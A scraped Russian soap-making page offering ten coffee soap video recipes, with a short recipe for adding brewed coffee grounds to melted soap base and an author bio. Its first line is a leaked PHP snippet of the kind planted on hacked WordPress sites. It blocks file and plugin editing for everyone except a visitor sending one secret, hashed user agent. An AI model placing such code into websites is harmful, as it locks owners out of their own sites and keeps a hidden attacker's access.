if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 10 видеорецептов мыла с кофе своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

10 видеорецептов мыла с кофе своими руками

Натуральная косметика своими руками - это реальность, а не миф. Бодрящий аромат кофе с утра никого не сможет оставить равнодушным, а мыло с таким запахом найти сложно. Именно поэтому необходимо знать, как приготовить кофейное мыло, отличающееся скрабирующим эффектом. Об этом сегодняшняя подборка из 10 видео

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми — это реаль­ность, а не миф. Бод­ря­щий аро­мат кофе с утра нико­го не смо­жет оста­вить рав­но­душ­ным, а мыло с таким запа­хом най­ти слож­но. Имен­но поэто­му необ­хо­ди­мо знать, как при­го­то­вить кофей­ное мыло, отли­ча­ю­ще­е­ся скра­би­ру­ю­щим эффек­том. Об этом сего­дняш­няя под­бор­ка из 10 видео.

Конеч­но, глав­ным дей­ству­ю­щим ком­по­нен­том будет кофе, жела­тель­но при­об­ре­тай­те кофе в зер­нах, его запах более насы­щен­ный, а измель­чен­ные частич­ки смо­гут пре­крас­но отше­лу­шить кожу.

Вот один из рецептов:
измель­чен­ные зер­на кофе залей­те кипят­ком, и дай­те насто­ять­ся. Рас­хо­до­вать сле­ду­ет имен­но осев­шую кофей­ную гущу, необ­хо­ди­мо лишь доба­вить ее к рас­плав­лен­ной мыль­ной осно­ве. В каче­стве укра­ше­ний пре­вос­ход­но будут смот­реть­ся зер­ныш­ки кофе по периферии.

Отли­чие это­го мас­ла соб­ствен­но­го про­из­вод­ства в том, что не потре­бу­ет­ся ника­ко­го аро­ма­ти­за­то­ра, а для луч­ше­го увлаж­не­ния кожи отлич­но подой­дет мас­ло мака­да­ми или вино­град­ной косточ­ки. Смот­ри­те видео и забудь­те о куп­лен­ных скра­бах или непри­ят­ных кофей­ных обер­ты­ва­ни­ях, полу­чай­те удо­воль­ствие во вре­мя душа.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!